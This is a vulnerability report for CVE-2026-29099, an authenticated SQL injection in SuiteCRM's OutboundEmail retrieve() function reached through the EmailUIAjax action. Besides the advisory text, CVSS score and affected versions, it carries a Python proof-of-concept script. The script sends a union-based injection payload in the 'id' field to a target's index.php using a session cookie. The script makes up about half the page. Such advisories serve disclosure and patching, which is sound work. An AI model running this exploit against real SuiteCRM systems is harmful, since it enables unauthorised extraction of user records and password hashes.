Security Vulnerability Report

CVE-2026-29099

Published: 2026-03-19 23:16:42
Last Modified: 2026-03-24 14:45:01

Description

SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. Prior to versions 7.15.1 and 8.9.3, the `retrieve()` function in `include/OutboundEmail/OutboundEmail.php` fails to properly neutralize the user-controlled `$id` parameter. It is assumed that the function calling `retrieve()` will appropriately quote and sanitize the user input. However, two locations have been identified that can be reached through the `EmailUIAjax` action on the `Email()` module where this is not the case. As such, it is possible for an authenticated user to perform SQL injection through the `retrieve()` function. This affects the latest major versions 7.15 and 8.9. As there do not appear to be restrictions on which tables can be queried, it would be possible for an attacker to retrieve arbitrary information from the database, including user information and password hashes. Versions 7.15.1 and 8.9.3 patch the issue.

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Weakness: CWE-89 (SQL Injection)

Configurations (Affected Products)

cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:* - VULNERABLE: SuiteCRM < 7.15.1
cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:* - VULNERABLE: SuiteCRM >= 8.0.0 and < 8.9.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Proof of Concept (PoC) for CVE-2026-29099
# Description: Exploits SQL Injection in SuiteCRM via EmailUIAjax action.
import requests


def exploit_suitecrm(target_url, session_cookie):
    """
    Attempts to exploit the SQL injection vulnerability in SuiteCRM.
    """
    # The endpoint vulnerable to the attack
    url = f"{target_url}/index.php"

    # Payload targeting the $id parameter in retrieve()
    # Using a simple Union Based injection to extract database version
    sql_payload = "1' UNION SELECT 1,2,3,4,version(),6,7,8,9-- -"

    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
    }
    cookies = {
        "PHPSESSID": session_cookie
    }

    # Data payload simulating the EmailUIAjax request
    data = {
        "module": "Emails",
        "action": "EmailUIAjax",
        "emailUIAction": "getSingleMessageFromSugar",
        "id": sql_payload
    }

    try:
        response = requests.post(url, data=data, headers=headers, cookies=cookies, timeout=10)
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print("[+] Response:")
            print(response.text[:500])  # Print first 500 chars of response
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    # Replace with actual target and valid session cookie
    target = "http://localhost/suitecrm"
    session_id = "valid_authenticated_session_id_here"
    exploit_suitecrm(target, session_id)
```

References

https://docs.suitecrm.com/admin/releases/7.15.x (Release Notes)
https://github.com/SuiteCRM/SuiteCRM/security/advisories/GHSA-38rf-h37x-7767 (Vendor Advisory)